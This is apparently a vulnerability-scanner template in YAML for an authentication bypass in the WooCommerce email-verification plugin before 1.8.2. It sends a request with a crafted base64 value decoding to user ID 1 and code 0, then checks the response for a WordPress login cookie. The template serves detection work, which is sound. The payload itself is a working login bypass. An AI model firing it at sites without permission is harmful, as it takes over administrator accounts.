30 lines
838 B
YAML
30 lines
838 B
YAML
|
id: wp-woocommerce-email-verification
|
||
|
info:
|
||
|
name: wordpress-emails-verification-for-woocommerce
|
||
|
author: random_robbie
|
||
|
severity: critical
|
||
|
tags: wordpress,wp-plugin
|
||
|
description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
|
||
|
reference: https://wpvulndb.com/vulnerabilities/10318
|
||
|
# GDPR plugin may give a false positive so double check headers
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
||
|
- "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
||
|
|
||
|
stop-at-first-match: true
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "wordpress_logged_in"
|
||
|
part: header
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 401
|
||
|
- 403
|
||
|
negative: true
|